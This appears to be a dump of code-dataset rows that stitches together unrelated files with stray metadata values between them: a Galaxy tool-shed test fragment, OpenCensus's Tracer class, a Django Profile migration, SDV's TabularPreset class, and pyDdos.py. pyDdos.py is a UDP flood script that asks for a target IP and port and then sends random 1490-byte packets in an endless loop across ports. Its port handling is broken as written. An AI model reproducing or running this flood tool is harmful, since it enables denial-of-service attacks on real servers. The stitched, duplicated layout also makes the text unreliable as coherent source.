<section id="fasta_fastq_manipulation" name="Fasta Fastq Manipulation" version="">
<tool file="toolshed.g2.bx.psu.edu/repos/peterjc/seq_filter_by_id/fb1313d79396/seq_filter_by_id/tools/seq_filter_by_id/seq_filter_by_id.xml" guid="toolshed.g2.bx.psu.edu/repos/peterjc/seq_filter_by_id/seq_filter_by_id/0.2.5">
<tool_shed>toolshed.g2.bx.psu.edu</tool_shed>
</tool>
</section>"""
assert s == PRETTY
def test_parse_xml_enoent():
fd, path = tempfile.mkstemp()
os.close(fd)
os.remove(path)
with pytest.raises(IOError) as excinfo:
util.parse_xml(path)
assert excinfo.value.errno == errno.ENOENT
|
en
| 0.577461
|
<?xml version="1.0" ?> <section id="fasta_fastq_manipulation" name="Fasta Fastq Manipulation" version=""> <tool file="toolshed.g2.bx.psu.edu/repos/peterjc/seq_filter_by_id/fb1313d79396/seq_filter_by_id/tools/seq_filter_by_id/seq_filter_by_id.xml" guid="toolshed.g2.bx.psu.edu/repos/peterjc/seq_filter_by_id/seq_filter_by_id/0.2.5"> <tool_shed> toolshed.g2.bx.psu.edu </tool_shed> </tool> </section> <?xml version="1.0" ?> <section id="fasta_fastq_manipulation" name="Fasta Fastq Manipulation" version=""> <tool file="toolshed.g2.bx.psu.edu/repos/peterjc/seq_filter_by_id/fb1313d79396/seq_filter_by_id/tools/seq_filter_by_id/seq_filter_by_id.xml" guid="toolshed.g2.bx.psu.edu/repos/peterjc/seq_filter_by_id/seq_filter_by_id/0.2.5"> <tool_shed>toolshed.g2.bx.psu.edu</tool_shed> </tool> </section>
| 2.317138
| 2
|
.venv/lib/python3.8/site-packages/opencensus/trace/tracer.py
|
MarkusMeyer13/graph-teams-presence
| 0
|
6627571
|
# Copyright 2017, OpenCensus Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools

from opencensus.trace import execution_context, print_exporter, samplers
from opencensus.trace.propagation import trace_context_http_header_format
from opencensus.trace.span_context import SpanContext
from opencensus.trace.tracers import context_tracer, noop_tracer
class Tracer(object):
    """The Tracer is for tracing a request for web applications.

    :type span_context: :class:`~opencensus.trace.span_context.SpanContext`
    :param span_context: SpanContext encapsulates the current context within
                         the request's trace.

    :type sampler: :class:`~opencensus.trace.samplers.base.Sampler`
    :param sampler: Instances of Sampler objects. Defaults to
                    :class:`.ProbabilitySampler`. Other options include
                    :class:`.AlwaysOnSampler` and :class:`.AlwaysOffSampler`.

    :type exporter: :class:`~opencensus.trace.base_exporter.exporter`
    :param exporter: Instances of exporter objects. Default to
                     :class:`.Printexporter`. The rest options are
                     :class:`.Fileexporter`, :class:`.Printexporter`,
                     :class:`.Loggingexporter`, :class:`.Zipkinexporter`,
                     :class:`.GoogleCloudexporter`
    """

    def __init__(
            self,
            span_context=None,
            sampler=None,
            exporter=None,
            propagator=None):
        # Fill in defaults for any component the caller did not supply.
        if span_context is None:
            span_context = SpanContext()
        if sampler is None:
            sampler = samplers.ProbabilitySampler()
        if exporter is None:
            exporter = print_exporter.PrintExporter()
        if propagator is None:
            propagator = \
                trace_context_http_header_format.TraceContextPropagator()
        self.span_context = span_context
        self.sampler = sampler
        self.exporter = exporter
        self.propagator = propagator
        # The concrete tracer depends on the sampling decision made now.
        self.tracer = self.get_tracer()
        self.store_tracer()

    def should_sample(self):
        """Determine whether to sample this request or not.

        If the context enables tracing, return True.
        Else follow the decision of the sampler.

        :rtype: bool
        :returns: Whether to trace the request or not.
        """
        return self.sampler.should_sample(self.span_context)

    def get_tracer(self):
        """Return a tracer according to the sampling decision."""
        sampled = self.should_sample()
        if sampled:
            self.span_context.trace_options.set_enabled(True)
            return context_tracer.ContextTracer(
                exporter=self.exporter,
                span_context=self.span_context)
        return noop_tracer.NoopTracer()

    def store_tracer(self):
        """Add the current tracer to thread_local"""
        execution_context.set_opencensus_tracer(self)

    def finish(self):
        """End all spans."""
        self.tracer.finish()

    def span(self, name='span'):
        """Create a new span with the trace using the context information.

        :type name: str
        :param name: The name of the span.

        :rtype: :class:`~opencensus.trace.span.Span`
        :returns: The Span object.
        """
        return self.tracer.span(name)

    def start_span(self, name='span'):
        """Start a new span; see :meth:`span` for the context-manager form."""
        return self.tracer.start_span(name)

    def end_span(self):
        """End a span. Update the span_id in SpanContext to the current span's
        parent span id; Update the current span; Send the span to exporter.
        """
        self.tracer.end_span()

    def current_span(self):
        """Return the current span."""
        return self.tracer.current_span()

    def add_attribute_to_current_span(self, attribute_key, attribute_value):
        """Add attribute to current span.

        :type attribute_key: str
        :param attribute_key: Attribute key.

        :type attribute_value: str
        :param attribute_value: Attribute value.
        """
        self.tracer.add_attribute_to_current_span(
            attribute_key, attribute_value)

    def trace_decorator(self):
        """Decorator to trace a function.

        The span is ended in a ``finally`` block so it is always closed,
        even when the wrapped function raises (the previous implementation
        leaked the span on exceptions). ``functools.wraps`` preserves the
        wrapped function's metadata.
        """
        def decorator(func):
            @functools.wraps(func)
            def wrapper(*args, **kwargs):
                self.tracer.start_span(name=func.__name__)
                try:
                    return func(*args, **kwargs)
                finally:
                    self.tracer.end_span()
            return wrapper
        return decorator
|
# Copyright 2017, OpenCensus Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from opencensus.trace import execution_context, print_exporter, samplers
from opencensus.trace.propagation import trace_context_http_header_format
from opencensus.trace.span_context import SpanContext
from opencensus.trace.tracers import context_tracer, noop_tracer
class Tracer(object):
"""The Tracer is for tracing a request for web applications.
:type span_context: :class:`~opencensus.trace.span_context.SpanContext`
:param span_context: SpanContext encapsulates the current context within
the request's trace.
:type sampler: :class:`~opencensus.trace.samplers.base.Sampler`
:param sampler: Instances of Sampler objects. Defaults to
:class:`.ProbabilitySampler`. Other options include
:class:`.AlwaysOnSampler` and :class:`.AlwaysOffSampler`.
:type exporter: :class:`~opencensus.trace.base_exporter.exporter`
:param exporter: Instances of exporter objects. Default to
:class:`.Printexporter`. The rest options are
:class:`.Fileexporter`, :class:`.Printexporter`,
:class:`.Loggingexporter`, :class:`.Zipkinexporter`,
:class:`.GoogleCloudexporter`
"""
def __init__(
self,
span_context=None,
sampler=None,
exporter=None,
propagator=None):
if span_context is None:
span_context = SpanContext()
if sampler is None:
sampler = samplers.ProbabilitySampler()
if exporter is None:
exporter = print_exporter.PrintExporter()
if propagator is None:
propagator = \
trace_context_http_header_format.TraceContextPropagator()
self.span_context = span_context
self.sampler = sampler
self.exporter = exporter
self.propagator = propagator
self.tracer = self.get_tracer()
self.store_tracer()
def should_sample(self):
"""Determine whether to sample this request or not.
If the context enables tracing, return True.
Else follow the decision of the sampler.
:rtype: bool
:returns: Whether to trace the request or not.
"""
return self.sampler.should_sample(self.span_context)
def get_tracer(self):
"""Return a tracer according to the sampling decision."""
sampled = self.should_sample()
if sampled:
self.span_context.trace_options.set_enabled(True)
return context_tracer.ContextTracer(
exporter=self.exporter,
span_context=self.span_context)
return noop_tracer.NoopTracer()
def store_tracer(self):
"""Add the current tracer to thread_local"""
execution_context.set_opencensus_tracer(self)
def finish(self):
"""End all spans."""
self.tracer.finish()
def span(self, name='span'):
"""Create a new span with the trace using the context information.
:type name: str
:param name: The name of the span.
:rtype: :class:`~opencensus.trace.span.Span`
:returns: The Span object.
"""
return self.tracer.span(name)
def start_span(self, name='span'):
return self.tracer.start_span(name)
def end_span(self):
"""End a span. Update the span_id in SpanContext to the current span's
parent span id; Update the current span; Send the span to exporter.
"""
self.tracer.end_span()
def current_span(self):
"""Return the current span."""
return self.tracer.current_span()
def add_attribute_to_current_span(self, attribute_key, attribute_value):
"""Add attribute to current span.
:type attribute_key: str
:param attribute_key: Attribute key.
:type attribute_value:str
:param attribute_value: Attribute value.
"""
self.tracer.add_attribute_to_current_span(
attribute_key, attribute_value)
def trace_decorator(self):
"""Decorator to trace a function."""
def decorator(func):
def wrapper(*args, **kwargs):
self.tracer.start_span(name=func.__name__)
return_value = func(*args, **kwargs)
self.tracer.end_span()
return return_value
return wrapper
return decorator
|
en
| 0.626857
|
# Copyright 2017, OpenCensus Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. The Tracer is for tracing a request for web applications.
:type span_context: :class:`~opencensus.trace.span_context.SpanContext`
:param span_context: SpanContext encapsulates the current context within
the request's trace.
:type sampler: :class:`~opencensus.trace.samplers.base.Sampler`
:param sampler: Instances of Sampler objects. Defaults to
:class:`.ProbabilitySampler`. Other options include
:class:`.AlwaysOnSampler` and :class:`.AlwaysOffSampler`.
:type exporter: :class:`~opencensus.trace.base_exporter.exporter`
:param exporter: Instances of exporter objects. Default to
:class:`.Printexporter`. The rest options are
:class:`.Fileexporter`, :class:`.Printexporter`,
:class:`.Loggingexporter`, :class:`.Zipkinexporter`,
:class:`.GoogleCloudexporter` Determine whether to sample this request or not.
If the context enables tracing, return True.
Else follow the decision of the sampler.
:rtype: bool
:returns: Whether to trace the request or not. Return a tracer according to the sampling decision. Add the current tracer to thread_local End all spans. Create a new span with the trace using the context information.
:type name: str
:param name: The name of the span.
:rtype: :class:`~opencensus.trace.span.Span`
:returns: The Span object. End a span. Update the span_id in SpanContext to the current span's
parent span id; Update the current span; Send the span to exporter. Return the current span. Add attribute to current span.
:type attribute_key: str
:param attribute_key: Attribute key.
:type attribute_value:str
:param attribute_value: Attribute value. Decorator to trace a function.
| 1.879661
| 2
|
pyDdos.py
|
leak37/pyDdos
| 0
|
6627572
|
#Made by Leak#5749
#Contributed to github
#Special thanks to NumeX
import sys
import os
import time
import socket
import random
from datetime import datetime
now = datetime.now()
hour = now.hour
minute = now.minute
day = now.day
month = now.month
year = now.year
##############
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
#############
os.system("toilet -fmono12 -F py ddos")
print
print ("\033[96mAuthor : Leak#5749")
print ("github :\033[0m \033[95mhttps://github.com/svrnn\033[0m")
print ("\033[96m--Py DDOS \033[0m\033[93mPyDDOS \033[0m")
print ("\033[92m-----> PyDDOS-v1 <-----\033[0m")
time.sleep(1)
print("\033[91m[--\033[0m\033[92m--\033[0m--\033[93m--\033[0m--\033[94m--\033[0m--\033[95m--\033[0m--\033[96m--\033[0m--\033[97m--\033[92m--]")
time.sleep(1)
print("\033[92m> Put Target information\033[0m")
print
ip = input("\033[93m> Target IP\033[0m -> ")
port = input("\033[91m> Server Port\033[0m -> ")
print
print("\033[93m----- > Waiting for a moment < ----- \033[0m")
time.sleep(2)
print("\033[91m--\033[0m\033[92m--\033[0m--\033[93m--\033[0m--\033[94m--\033[0m--\033[95m--\033[0m--\033[96m--\033[0m--\033[97m--\033[92m--")
print ("\033[91m---- > \033[93mSuccess ddosing..\033[0m \033[91m< ----\033[0m")
print ("\033[95mStarting in 1 sec \033[0m")
time.sleep(1)
sent = 0
while True:
sock.sendto(bytes, (ip,port))
sent = sent + 1
port = port + 1
print ("\033[32;1mAttacking Target \033[31;1m%s \033[32;1mwith IP \033[33;1m%s \033[32;1mwith bytes \033[34;1m%s"%(sent,ip,port))
if port == 65534:
port = 1
|
#Made by Leak#5749
#Contributed to github
#Special thanks to NumeX
import sys
import os
import time
import socket
import random
from datetime import datetime
now = datetime.now()
hour = now.hour
minute = now.minute
day = now.day
month = now.month
year = now.year
##############
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
#############
os.system("toilet -fmono12 -F py ddos")
print
print ("\033[96mAuthor : Leak#5749")
print ("github :\033[0m \033[95mhttps://github.com/svrnn\033[0m")
print ("\033[96m--Py DDOS \033[0m\033[93mPyDDOS \033[0m")
print ("\033[92m-----> PyDDOS-v1 <-----\033[0m")
time.sleep(1)
print("\033[91m[--\033[0m\033[92m--\033[0m--\033[93m--\033[0m--\033[94m--\033[0m--\033[95m--\033[0m--\033[96m--\033[0m--\033[97m--\033[92m--]")
time.sleep(1)
print("\033[92m> Put Target information\033[0m")
print
ip = input("\033[93m> Target IP\033[0m -> ")
port = input("\033[91m> Server Port\033[0m -> ")
print
print("\033[93m----- > Waiting for a moment < ----- \033[0m")
time.sleep(2)
print("\033[91m--\033[0m\033[92m--\033[0m--\033[93m--\033[0m--\033[94m--\033[0m--\033[95m--\033[0m--\033[96m--\033[0m--\033[97m--\033[92m--")
print ("\033[91m---- > \033[93mSuccess ddosing..\033[0m \033[91m< ----\033[0m")
print ("\033[95mStarting in 1 sec \033[0m")
time.sleep(1)
sent = 0
while True:
sock.sendto(bytes, (ip,port))
sent = sent + 1
port = port + 1
print ("\033[32;1mAttacking Target \033[31;1m%s \033[32;1mwith IP \033[33;1m%s \033[32;1mwith bytes \033[34;1m%s"%(sent,ip,port))
if port == 65534:
port = 1
|
en
| 0.569365
|
#Made by Leak#5749 #Contributed to github #Special thanks to NumeX ############## ############# #5749")
| 2.586241
| 3
|
accounts/migrations/0001_initial.py
|
JulienPalard/PonyConf
| 11
|
6627573
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2017-11-18 20:14
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
def profile_forward(apps, schema_editor):
    """Backfill: create a Profile row for every existing user (idempotent)."""
    user_model = apps.get_model(settings.AUTH_USER_MODEL)
    profile_model = apps.get_model("accounts", "Profile")
    alias = schema_editor.connection.alias
    for user in user_model.objects.using(alias).all():
        profile_model.objects.using(alias).get_or_create(user=user)
def profile_backward(apps, schema_editor):
    """Reverse no-op: Profile rows need no explicit cleanup when unapplying."""
class Migration(migrations.Migration):
    # Initial migration for the accounts app: creates the Profile model
    # (one-to-one with the user model) and backfills a Profile per user.

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Profile',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('phone_number', models.CharField(blank=True, default='', max_length=16, verbose_name='Phone number')),
                ('sms_prefered', models.BooleanField(default=False, verbose_name='SMS prefered')),
                ('biography', models.TextField(blank=True, verbose_name='Biography')),
                # Social / web presence fields; all optional free-form text.
                ('twitter', models.CharField(blank=True, default='', max_length=100, verbose_name='Twitter')),
                ('linkedin', models.CharField(blank=True, default='', max_length=100, verbose_name='LinkedIn')),
                ('github', models.CharField(blank=True, default='', max_length=100, verbose_name='Github')),
                ('website', models.CharField(blank=True, default='', max_length=100, verbose_name='Website')),
                ('facebook', models.CharField(blank=True, default='', max_length=100, verbose_name='Facebook')),
                ('mastodon', models.CharField(blank=True, default='', max_length=100, verbose_name='Mastodon')),
                # Deleting the user cascades to the profile.
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        # Data migration: ensure pre-existing users also get a Profile row.
        migrations.RunPython(profile_forward, profile_backward),
    ]
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2017-11-18 20:14
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
def profile_forward(apps, schema_editor):
User = apps.get_model(settings.AUTH_USER_MODEL)
Profile = apps.get_model("accounts", "Profile")
db_alias = schema_editor.connection.alias
for user in User.objects.using(db_alias).all():
Profile.objects.using(db_alias).get_or_create(user=user)
def profile_backward(apps, schema_editor):
pass
class Migration(migrations.Migration):
    """Initial migration: creates the Profile model and backfills one
    Profile per existing user via the RunPython data migration."""

    initial = True

    dependencies = [
        # Profile.user points at the (possibly swapped) user model.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Profile',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('phone_number', models.CharField(blank=True, default='', max_length=16, verbose_name='Phone number')),
                ('sms_prefered', models.BooleanField(default=False, verbose_name='SMS prefered')),
                ('biography', models.TextField(blank=True, verbose_name='Biography')),
                ('twitter', models.CharField(blank=True, default='', max_length=100, verbose_name='Twitter')),
                ('linkedin', models.CharField(blank=True, default='', max_length=100, verbose_name='LinkedIn')),
                ('github', models.CharField(blank=True, default='', max_length=100, verbose_name='Github')),
                ('website', models.CharField(blank=True, default='', max_length=100, verbose_name='Website')),
                ('facebook', models.CharField(blank=True, default='', max_length=100, verbose_name='Facebook')),
                ('mastodon', models.CharField(blank=True, default='', max_length=100, verbose_name='Mastodon')),
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        # Data migration: ensure every pre-existing user gets a Profile row.
        migrations.RunPython(profile_forward, profile_backward),
    ]
|
en
| 0.663569
|
# -*- coding: utf-8 -*- # Generated by Django 1.11.1 on 2017-11-18 20:14
| 1.957031
| 2
|
sdv/lite/tabular.py
|
HDI-Project/SDV
| 39
|
6627574
|
<reponame>HDI-Project/SDV<filename>sdv/lite/tabular.py
"""Base class for tabular model presets."""
import logging
import pickle
import sys
import warnings
import numpy as np
import rdt
from sdv.metadata import Table
from sdv.tabular import GaussianCopula
from sdv.utils import get_package_versions, throw_version_mismatch_warning
# Module-level logger for this module.
LOGGER = logging.getLogger(__name__)

# Name of the only preset currently shipped.
FAST_ML_PRESET = 'FAST_ML'

# Maps each preset name to the human-readable description printed by
# ``TabularPreset.list_available_presets``.
PRESETS = {
    FAST_ML_PRESET: 'Use this preset to minimize the time needed to create a synthetic data model.'
}
class TabularPreset():
    """Class for all tabular model presets.

    A preset bundles a pre-configured model (currently ``GaussianCopula``)
    with transformer settings tuned for a particular goal.

    Args:
        name (str):
            The preset to use.
        metadata (dict or metadata.Table):
            Table metadata instance or dict representation.
        constraints (list[Constraint, dict]):
            List of Constraint objects or dicts.
    """

    _model = None
    # Per-column fraction of nulls observed during fit; used to re-inject
    # nulls after sampling when the transformers do not model them.
    _null_percentages = None
    _null_column = False
    _default_model = GaussianCopula

    def __init__(self, name=None, metadata=None, constraints=None):
        if name is None:
            raise ValueError('You must provide the name of a preset using the `name` '
                             'parameter. Use `TabularPreset.list_available_presets()` to browse '
                             'through the options.')
        if name not in PRESETS:
            raise ValueError(f'`name` must be one of {PRESETS}.')

        self.name = name

        if metadata is None:
            warnings.warn('No metadata provided. Metadata will be automatically '
                          'detected from your data. This process may not be accurate. '
                          'We recommend writing metadata to ensure correct data handling.')

        if metadata is not None and isinstance(metadata, Table):
            metadata = metadata.to_dict()

        # Fold explicit constraints into the metadata dict so the model
        # receives them through a single channel.
        if metadata is not None and constraints is not None:
            metadata['constraints'] = []
            for constraint in constraints:
                metadata['constraints'].append(constraint.to_dict())

            constraints = None

        if name == FAST_ML_PRESET:
            self._model = GaussianCopula(
                table_metadata=metadata,
                constraints=constraints,
                categorical_transformer='categorical_fuzzy',
                default_distribution='gaussian',
                rounding=None,
            )

            # Decide if transformers should model the null column or not.
            self._null_column = constraints is not None
            if metadata is not None:
                self._null_column = len(metadata.get('constraints', [])) > 0

            # If transformers should model the null column, pass None to let each transformer
            # decide if it's necessary or not.
            transformer_null_column = None if self._null_column else False

            dtype_transformers = {
                'i': rdt.transformers.NumericalTransformer(
                    dtype=np.int64,
                    nan='mean' if self._null_column else None,
                    null_column=transformer_null_column,
                    min_value='auto',
                    max_value='auto',
                ),
                'f': rdt.transformers.NumericalTransformer(
                    dtype=np.float64,
                    nan='mean' if self._null_column else None,
                    null_column=transformer_null_column,
                    min_value='auto',
                    max_value='auto',
                ),
                'O': rdt.transformers.CategoricalTransformer(fuzzy=True),
                'b': rdt.transformers.BooleanTransformer(
                    nan=-1 if self._null_column else None,
                    null_column=transformer_null_column,
                ),
                'M': rdt.transformers.DatetimeTransformer(
                    nan='mean' if self._null_column else None,
                    null_column=transformer_null_column,
                ),
            }
            self._model._metadata._dtype_transformers.update(dtype_transformers)

    def fit(self, data):
        """Fit this model to the data.

        Args:
            data (pandas.DataFrame):
                Data to fit the model to.
        """
        if not self._null_column:
            self._null_percentages = {}

            # ``DataFrame.items()`` replaces the deprecated ``iteritems()``,
            # which was removed in pandas 2.0; both iterate (column, Series).
            for column, column_data in data.items():
                num_nulls = column_data.isna().sum()
                if num_nulls > 0:
                    # Store null percentage for future reference.
                    self._null_percentages[column] = num_nulls / len(column_data)

        self._model.fit(data)

    def _postprocess_sampled(self, sampled):
        """Postprocess the sampled data.

        Add null values back based on null percentages captured in the
        fitting process.

        Args:
            sampled (pandas.DataFrame):
                The sampled data to postprocess.

        Returns:
            pandas.DataFrame
        """
        if self._null_percentages:
            for column, percentage in self._null_percentages.items():
                # Mask roughly ``percentage`` of the rows with nulls.
                sampled[column] = sampled[column].mask(
                    np.random.random((len(sampled), )) < percentage)

        return sampled

    def sample(self, num_rows, randomize_samples=True, batch_size=None, output_file_path=None,
               conditions=None):
        """Sample rows from this table.

        Args:
            num_rows (int):
                Number of rows to sample. This parameter is required.
            randomize_samples (bool):
                Whether or not to use a fixed seed when sampling. Defaults
                to True.
            batch_size (int or None):
                The batch size to sample. Defaults to `num_rows`, if None.
            output_file_path (str or None):
                The file to periodically write sampled rows to. If None, does not
                write rows anywhere.
            conditions:
                Deprecated argument. Use the `sample_conditions` method with
                `sdv.sampling.Condition` objects instead.

        Returns:
            pandas.DataFrame:
                Sampled data.
        """
        sampled = self._model.sample(
            num_rows, randomize_samples, batch_size, output_file_path, conditions)
        return self._postprocess_sampled(sampled)

    def sample_conditions(self, conditions, max_tries=100, batch_size_per_try=None,
                          randomize_samples=True, output_file_path=None):
        """Sample rows from this table with the given conditions.

        Args:
            conditions (list[sdv.sampling.Condition]):
                A list of sdv.sampling.Condition objects, which specify the column
                values in a condition, along with the number of rows for that
                condition.
            max_tries (int):
                Number of times to try sampling discarded rows. Defaults to 100.
            batch_size_per_try (int):
                The batch size to use per attempt at sampling. Defaults to 10 times
                the number of rows.
            randomize_samples (bool):
                Whether or not to use a fixed seed when sampling. Defaults
                to True.
            output_file_path (str or None):
                The file to periodically write sampled rows to. Defaults to
                a temporary file, if None.

        Returns:
            pandas.DataFrame:
                Sampled data.
        """
        # GaussianCopula takes keyword-only sampling options and no max_tries.
        if isinstance(self._model, GaussianCopula):
            sampled = self._model.sample_conditions(
                conditions,
                batch_size=batch_size_per_try,
                randomize_samples=randomize_samples,
                output_file_path=output_file_path,
            )
        else:
            sampled = self._model.sample_conditions(
                conditions, max_tries, batch_size_per_try, randomize_samples, output_file_path)

        return self._postprocess_sampled(sampled)

    def sample_remaining_columns(self, known_columns, max_tries=100, batch_size_per_try=None,
                                 randomize_samples=True, output_file_path=None):
        """Sample rows from this table.

        Args:
            known_columns (pandas.DataFrame):
                A pandas.DataFrame with the columns that are already known. The output
                is a DataFrame such that each row in the output is sampled
                conditionally on the corresponding row in the input.
            max_tries (int):
                Number of times to try sampling discarded rows. Defaults to 100.
            batch_size_per_try (int):
                The batch size to use per attempt at sampling. Defaults to 10 times
                the number of rows.
            randomize_samples (bool):
                Whether or not to use a fixed seed when sampling. Defaults
                to True.
            output_file_path (str or None):
                The file to periodically write sampled rows to. Defaults to
                a temporary file, if None.

        Returns:
            pandas.DataFrame:
                Sampled data.
        """
        # GaussianCopula takes keyword-only sampling options and no max_tries.
        if isinstance(self._model, GaussianCopula):
            sampled = self._model.sample_remaining_columns(
                known_columns,
                batch_size=batch_size_per_try,
                randomize_samples=randomize_samples,
                output_file_path=output_file_path,
            )
        else:
            sampled = self._model.sample_remaining_columns(
                known_columns, max_tries, batch_size_per_try, randomize_samples, output_file_path)

        return self._postprocess_sampled(sampled)

    def save(self, path):
        """Save this model instance to the given path using pickle.

        Args:
            path (str):
                Path where the SDV instance will be serialized.
        """
        # Record package versions so ``load`` can warn on mismatches.
        self._package_versions = get_package_versions(getattr(self, '_model', None))

        with open(path, 'wb') as output:
            pickle.dump(self, output)

    @classmethod
    def load(cls, path):
        """Load a TabularModel instance from a given path.

        Args:
            path (str):
                Path from which to load the instance.

        Returns:
            TabularModel:
                The loaded tabular model.
        """
        with open(path, 'rb') as f:
            model = pickle.load(f)
            throw_version_mismatch_warning(getattr(model, '_package_versions', None))
            return model

    @classmethod
    def list_available_presets(cls, out=sys.stdout):
        """List the available presets and their descriptions."""
        # Fixed typo in the user-facing text: "learn more an" -> "learn more about an".
        out.write(f'Available presets:\n{PRESETS}\n\n'
                  'Supply the desired preset using the `name` parameter.\n\n'
                  'Have any requests for custom presets? Contact the SDV team to learn '
                  'more about an SDV Premium license.\n')

    def __repr__(self):
        """Represent tabular preset instance as text.

        Returns:
            str
        """
        return f'TabularPreset(name={self.name})'
|
"""Base class for tabular model presets."""
import logging
import pickle
import sys
import warnings
import numpy as np
import rdt
from sdv.metadata import Table
from sdv.tabular import GaussianCopula
from sdv.utils import get_package_versions, throw_version_mismatch_warning
# Module-level logger for this module.
LOGGER = logging.getLogger(__name__)

# Name of the only preset currently shipped.
FAST_ML_PRESET = 'FAST_ML'

# Maps each preset name to the human-readable description printed by
# ``TabularPreset.list_available_presets``.
PRESETS = {
    FAST_ML_PRESET: 'Use this preset to minimize the time needed to create a synthetic data model.'
}
class TabularPreset():
    """Class for all tabular model presets.

    A preset bundles a pre-configured model (currently ``GaussianCopula``)
    with transformer settings tuned for a particular goal.

    Args:
        name (str):
            The preset to use.
        metadata (dict or metadata.Table):
            Table metadata instance or dict representation.
        constraints (list[Constraint, dict]):
            List of Constraint objects or dicts.
    """

    _model = None
    # Per-column fraction of nulls observed during fit; used to re-inject
    # nulls after sampling when the transformers do not model them.
    _null_percentages = None
    _null_column = False
    _default_model = GaussianCopula

    def __init__(self, name=None, metadata=None, constraints=None):
        if name is None:
            raise ValueError('You must provide the name of a preset using the `name` '
                             'parameter. Use `TabularPreset.list_available_presets()` to browse '
                             'through the options.')
        if name not in PRESETS:
            raise ValueError(f'`name` must be one of {PRESETS}.')

        self.name = name

        if metadata is None:
            warnings.warn('No metadata provided. Metadata will be automatically '
                          'detected from your data. This process may not be accurate. '
                          'We recommend writing metadata to ensure correct data handling.')

        if metadata is not None and isinstance(metadata, Table):
            metadata = metadata.to_dict()

        # Fold explicit constraints into the metadata dict so the model
        # receives them through a single channel.
        if metadata is not None and constraints is not None:
            metadata['constraints'] = []
            for constraint in constraints:
                metadata['constraints'].append(constraint.to_dict())

            constraints = None

        if name == FAST_ML_PRESET:
            self._model = GaussianCopula(
                table_metadata=metadata,
                constraints=constraints,
                categorical_transformer='categorical_fuzzy',
                default_distribution='gaussian',
                rounding=None,
            )

            # Decide if transformers should model the null column or not.
            self._null_column = constraints is not None
            if metadata is not None:
                self._null_column = len(metadata.get('constraints', [])) > 0

            # If transformers should model the null column, pass None to let each transformer
            # decide if it's necessary or not.
            transformer_null_column = None if self._null_column else False

            dtype_transformers = {
                'i': rdt.transformers.NumericalTransformer(
                    dtype=np.int64,
                    nan='mean' if self._null_column else None,
                    null_column=transformer_null_column,
                    min_value='auto',
                    max_value='auto',
                ),
                'f': rdt.transformers.NumericalTransformer(
                    dtype=np.float64,
                    nan='mean' if self._null_column else None,
                    null_column=transformer_null_column,
                    min_value='auto',
                    max_value='auto',
                ),
                'O': rdt.transformers.CategoricalTransformer(fuzzy=True),
                'b': rdt.transformers.BooleanTransformer(
                    nan=-1 if self._null_column else None,
                    null_column=transformer_null_column,
                ),
                'M': rdt.transformers.DatetimeTransformer(
                    nan='mean' if self._null_column else None,
                    null_column=transformer_null_column,
                ),
            }
            self._model._metadata._dtype_transformers.update(dtype_transformers)

    def fit(self, data):
        """Fit this model to the data.

        Args:
            data (pandas.DataFrame):
                Data to fit the model to.
        """
        if not self._null_column:
            self._null_percentages = {}

            # ``DataFrame.items()`` replaces the deprecated ``iteritems()``,
            # which was removed in pandas 2.0; both iterate (column, Series).
            for column, column_data in data.items():
                num_nulls = column_data.isna().sum()
                if num_nulls > 0:
                    # Store null percentage for future reference.
                    self._null_percentages[column] = num_nulls / len(column_data)

        self._model.fit(data)

    def _postprocess_sampled(self, sampled):
        """Postprocess the sampled data.

        Add null values back based on null percentages captured in the
        fitting process.

        Args:
            sampled (pandas.DataFrame):
                The sampled data to postprocess.

        Returns:
            pandas.DataFrame
        """
        if self._null_percentages:
            for column, percentage in self._null_percentages.items():
                # Mask roughly ``percentage`` of the rows with nulls.
                sampled[column] = sampled[column].mask(
                    np.random.random((len(sampled), )) < percentage)

        return sampled

    def sample(self, num_rows, randomize_samples=True, batch_size=None, output_file_path=None,
               conditions=None):
        """Sample rows from this table.

        Args:
            num_rows (int):
                Number of rows to sample. This parameter is required.
            randomize_samples (bool):
                Whether or not to use a fixed seed when sampling. Defaults
                to True.
            batch_size (int or None):
                The batch size to sample. Defaults to `num_rows`, if None.
            output_file_path (str or None):
                The file to periodically write sampled rows to. If None, does not
                write rows anywhere.
            conditions:
                Deprecated argument. Use the `sample_conditions` method with
                `sdv.sampling.Condition` objects instead.

        Returns:
            pandas.DataFrame:
                Sampled data.
        """
        sampled = self._model.sample(
